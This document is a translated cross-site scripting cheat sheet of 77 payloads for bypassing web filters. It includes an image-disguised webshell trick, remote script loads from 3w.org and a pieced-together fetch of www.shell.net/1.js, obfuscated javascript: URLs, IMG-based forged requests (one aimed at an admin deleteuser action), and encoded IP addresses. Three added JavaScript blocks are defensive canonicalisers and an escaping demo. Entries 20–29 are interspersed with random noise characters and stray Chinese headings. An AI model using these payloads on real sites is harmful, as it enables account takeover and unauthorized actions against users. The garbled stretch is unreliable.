Cross-site image shell
XSS cross-site code: <script>alert("")</script>
Put that code on the first line of the webshell and rename the shell to a .jpg. When the image-format shell is requested it still executes (this only works where the server is configured to run .jpg files through its script handler).

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (the semicolons are required)
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (work the character codes out with a calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode (decimal entity) encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) Long, 7-digit padded UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab splitting the word "javascript" (the tab is rendered as a space here)
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab splitting the word (rendered as a space here)
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline (rendered as a space here)
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return (rendered as a space here)
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line injected JavaScript; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (all the pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null bytes are basically ineffective on domestic sites, since there is nowhere to make use of them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
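
Entries (3) through (19) are all the same javascript: URL with its bytes disguised. The JavaScript below is an added example and is not part of the original cheat sheet: it decodes an attribute value the way an HTML attribute and URL parser would, then classifies the scheme, so every one of those disguises collapses to the same string. The vector list inside it is constructed from the entries above; decodeCharRefs, canonicalScheme, isScriptUrl and isAllowedLinkTarget are names chosen for this example.

```javascript
// Added example, not part of the original cheat sheet. A filter that looks
// for the literal text "javascript:" misses entries (3)-(19) because the
// browser decodes character references, removes tab/LF/CR, strips leading
// control characters and lower-cases the scheme before it resolves a URL.
// Check the canonical form, never the raw attribute text.

const NAMED_REFS = { quot: '"', amp: '&', lt: '<', gt: '>', apos: "'", Tab: '\t', NewLine: '\n' };

// Decode numeric references (&#106; &#x6A; zero-padded &#0000106, with or
// without the trailing ';') and a few named ones, as an attribute value is
// decoded. Unknown names and out-of-range code points are left untouched.
function decodeCharRefs(s) {
  return s.replace(/&(?:#[xX]([0-9a-fA-F]+)|#([0-9]+)|([A-Za-z]+));?/g, (m, hex, dec, name) => {
    if (hex !== undefined || dec !== undefined) {
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp <= 0x10FFFF ? String.fromCodePoint(cp) : m;
    }
    return Object.prototype.hasOwnProperty.call(NAMED_REFS, name) ? NAMED_REFS[name] : m;
  });
}

// Reduce an attribute value to the scheme a browser would resolve it with.
// NUL is dropped as legacy engines did (entry 17); modern HTML turns it into
// U+FFFD, which breaks the scheme, so treating it as removable is conservative.
function canonicalScheme(attrValue) {
  let u = decodeCharRefs(String(attrValue));
  u = u.replace(/^[\u0000-\u0020]+/, '');   // leading C0 controls and spaces (entry 19)
  u = u.replace(/[\t\n\r\u0000]/g, '');     // embedded tab, LF, CR (entries 11-14), NUL
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):/.exec(u);
  return m ? m[1].toLowerCase() : null;
}

// Blocklist view: does this value run script when used as a URL?
function isScriptUrl(attrValue) {
  const scheme = canonicalScheme(attrValue);
  return scheme === 'javascript' || scheme === 'vbscript';
}

// Allowlist view, which is the check to ship: accept only intended schemes.
// Relative URLs (no scheme at all) are allowed through.
function isAllowedLinkTarget(attrValue, allowed = ['http', 'https', 'mailto']) {
  const scheme = canonicalScheme(attrValue);
  return scheme === null || allowed.includes(scheme);
}

// Constructed inputs mirroring entries (3)-(19); all but the last are script URLs.
const VECTORS = [
  "javascript:alert('XSS')",
  "JaVaScRiPt:alert('XSS')",
  "javascript:alert(&quot;XSS&quot;)",
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
  "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",
  "&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;alert('XSS')",
  "jav\tascript:alert('XSS');",
  "jav&#x09;ascript:alert('XSS');",
  "jav&#x0A;ascript:alert('XSS');",
  "jav&#x0D;ascript:alert('XSS');",
  "java\u0000script:alert(\"XSS\")",
  " &#14;  javascript:alert('XSS');",
  "https://example.invalid/page",
];

function classifyAll(vectors = VECTORS) {
  return vectors.map(v => ({ input: v, scheme: canonicalScheme(v), script: isScriptUrl(v) }));
}
```

The blocklist function exists only to make the point; isAllowedLinkTarget is the check to use, because a new scheme or a decoding trick the blocklist does not know about fails closed there instead of open.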
2 ~! X3 i+ k8 f% c; K. W0 E, q(20)Non-alpha-non-digit XSS* C. P: s5 e, Y- f. P
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>) Q" Y; Z; j# r3 s. i
7 ^: m# N, |+ O$ y% }; ~
(21)Non-alpha-non-digit XSS to 2$ c: l4 H* k) H
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)># f/ Z/ g& W. d9 G
8 l7 e& J" P, n$ `# N) z
(22)Non-alpha-non-digit XSS to 3
. H' d8 }, |( s3 g" @/ U<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% l0 W, M3 V3 l
2 |' N3 g0 b1 T. p3 Z. V(23)双开括号8 i. }5 x/ F; `/ d2 Y
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
2 L: ]- `4 s2 l) B; J9 f% r) d( G9 Q% O" `) J0 c
(24)无结束脚本标记(仅火狐等浏览器); K. q8 _7 p/ l% R
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
+ }7 i3 t3 e8 j" }3 O+ Q+ @& y, Y( ~0 {
(25)无结束脚本标记2
7 [4 [/ p2 D! H% c2 o<SCRIPT SRC=//3w.org/XSS/xss.js>4 q: d5 ]; E- B- n( Q2 D& F
/ g" J# H1 j) Z2 J3 C. Y
(26)半开的HTML/JavaScript XSS
3 G% P& ^4 Q# ]% O<IMG SRC=”javascript:alert(‘XSS’)”4 {- p$ |& u3 ]+ q0 x7 {
2 R1 h4 X& o, o( q2 @
(27)双开角括号
6 z# N. t& c5 W1 M. N6 C<iframe src=http://3w.org/XSS.html < c8 M# i0 r: x4 x
/ y# _, _7 c$ w- A% @. d
(28)无单引号 双引号 分号
" h1 u( K0 P0 @8 {<SCRIPT>a=/XSS/) A5 N5 [* l+ m- @
alert(a.source)</SCRIPT>0 E1 e6 k. l2 m* M* ?" D
8 A x, y) S7 h4 \; F(29)换码过滤的JavaScript
. ^: ]0 u. b3 I\”;alert(‘XSS’);//
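
Entry (29) works against pages that place user input inside a JavaScript string literal and only backslash-escape the quote. The JavaScript below is an added example, not code from the original list: it shows that vulnerable escaper beside a JSON-based one and executes the generated script with alert('XSS') swapped for a write to a marker variable, so the breakout is observable. The function names, the sandbox object and the PAYLOAD string are constructed for this example.

```javascript
// Added example, not from the original list. Entry (29) targets code that
// drops input into a JavaScript string literal and "escapes" it by prefixing
// double quotes with a backslash. An attacker-supplied backslash consumes the
// added one, the quote then closes the literal and the rest of the input runs
// as code. alert() is replaced by a marker so the breakout can be observed.

// Vulnerable: escapes only the double quote, never the backslash.
function naiveJsString(s) {
  return '"' + s.replace(/"/g, '\\"') + '"';
}

// Hardened: JSON.stringify escapes backslash, quote and control characters.
// The extra replacements stop the literal from ever containing "</script>"
// (which the HTML parser acts on before JavaScript sees it) and the line
// terminators U+2028/U+2029 that JSON allows raw but older JS engines rejected.
function safeJsString(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Emit the inline script a page would generate and execute it. `new Function`
// is used only to parse and run the text; it is not a security boundary.
function render(escaper, input) {
  const sandbox = { pwned: false };
  const code = 'var x = ' + escaper(input) + ';\nreturn x;';
  try {
    const value = new Function('sandbox', code)(sandbox);
    return { code, executed: sandbox.pwned, value, error: null };
  } catch (e) {
    return { code, executed: sandbox.pwned, value: undefined, error: e.constructor.name };
  }
}

// Entry (29) with alert('XSS') swapped for a write to the marker (constructed input).
const PAYLOAD = '\\";sandbox.pwned=true;//';

// Runs both escapers against the payload and reports what happened.
function demo() {
  return { naive: render(naiveJsString, PAYLOAD), safe: render(safeJsString, PAYLOAD) };
}
```

With the naive escaper the generated line is var x = "\\";sandbox.pwned=true;//"; the literal ends after the escaped backslash and the injected statement executes. With the JSON-based escaper the whole payload stays inside the literal and comes back unchanged as the value of x.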

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY background image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) Style sheet via LINK
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG with VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE background
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD background
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character inserted before the URL (code points 1-32, 34, 39, 160, 8192-8213, 12288 and 65279 all work)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) Split expression in a STYLE attribute
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything that starts with an open angle bracket and a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash file can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is being filtered, put the JS code inside an image file and load that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; the victim's browser issues the GET request with their cookies, so any action reachable by GET runs as them
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command 2 (a.jpg is on the same server; an Apache redirect sends the image request on to the admin action)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass (for when a specific URL string is blocked)
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP address as a decimal integer
<A HREF="http://3232235521">XSS</A>

(71) IP address in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP address in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding (the URL also contains tabs and a newline, rendered here as spaces and a line break)
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
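
Entries (70) to (73) are one address written in the legacy inet_aton() notation that browsers still accept for numeric hosts. The JavaScript below is an added example, not the cheat sheet's own code: a canonicaliser that turns each of those spellings into a dotted quad, following the IPv4 parser rules of the WHATWG URL standard (split on dots, a trailing dot is dropped, 0x is hex, a leading 0 is octal, fewer than four labels fill the remaining bytes from the last label). The hostnames are taken from the entries above; the tab-separated form of (73) stands in for the tab and newline characters that this page renders as spaces. hostOfHref and canonicalIPv4 are names chosen here, and the href extraction handles only plain http(s) URLs without userinfo or port.

```javascript
// Added example, not from the original sheet. Entries (70)-(73) are the same
// address spelled in the legacy numeric-host grammar. Canonicalising lets a
// URL filter compare the real dotted quad instead of the obfuscated text.

// Parse one dot-separated label: 0x.. is hex, a leading 0 is octal, otherwise
// decimal. Returns null if the label is not a number in that radix.
function parseIPv4Part(part) {
  let radix = 10;
  let digits = part;
  if (/^0x/i.test(part)) { radix = 16; digits = part.slice(2); }
  else if (part.length > 1 && part[0] === '0') { radix = 8; digits = part.slice(1); }
  if (digits === '') return 0;                     // "0x" alone parses as 0
  const valid = { 10: /^[0-9]+$/, 16: /^[0-9a-f]+$/i, 8: /^[0-7]+$/ }[radix];
  return valid.test(digits) ? parseInt(digits, radix) : null;
}

// Canonical dotted quad for a numeric host, or null if the host is not numeric.
function canonicalIPv4(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop();  // trailing dot
  if (parts.length > 4) return null;
  const nums = parts.map(parseIPv4Part);
  if (nums.some(n => n === null)) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;   // last label fills the rest
  if (nums.slice(0, -1).some(n => n > 255)) return null;
  let addr = last;
  nums.slice(0, -1).forEach((n, i) => { addr += n * 256 ** (3 - i); });
  return [addr >>> 24, (addr >>> 16) & 255, (addr >>> 8) & 255, addr & 255].join('.');
}

// Remove the tab and newline characters a URL parser strips, then take the
// host of an absolute http(s) URL. No userinfo or port handling (assumption).
function hostOfHref(href) {
  const cleaned = href.replace(/[\t\n\r]/g, '');
  const m = /^https?:\/\/([^\/?#]*)/i.exec(cleaned);
  return m ? m[1] : null;
}

// Dotted quad for the host of an href, or null when it is not a numeric host.
function canonicalHostOfHref(href) {
  const host = hostOfHref(href);
  return host === null ? null : canonicalIPv4(host);
}

// Constructed hrefs from entries (70)-(73); the last one carries real tabs and
// a newline in place of the spaces shown on the page.
const OBFUSCATED = [
  'http://3232235521',
  'http://0xc0.0xa8.0x00.0x01',
  'http://0300.0250.0000.0001',
  'h\ntt\tp://6\t6.000146.0x7.147/',
];

function canonicaliseAll(hrefs = OBFUSCATED) {
  return hrefs.map(canonicalHostOfHref);
}
```

Modern URL implementations (including the WHATWG URL object in browsers and Node) apply this same grammar, so new URL('http://0xc0.0xa8.0x00.0x01/').hostname already yields the dotted quad; the hand-written version is here to make visible what each spelling resolves to. Any host or IP blocklist that compares the raw text of the href, as the filters these entries defeat do, has to canonicalise first.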

(74) Dropping the "http:"
<A HREF="//www.google.com/">XSS</A>

(75) Dropping the "www"
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>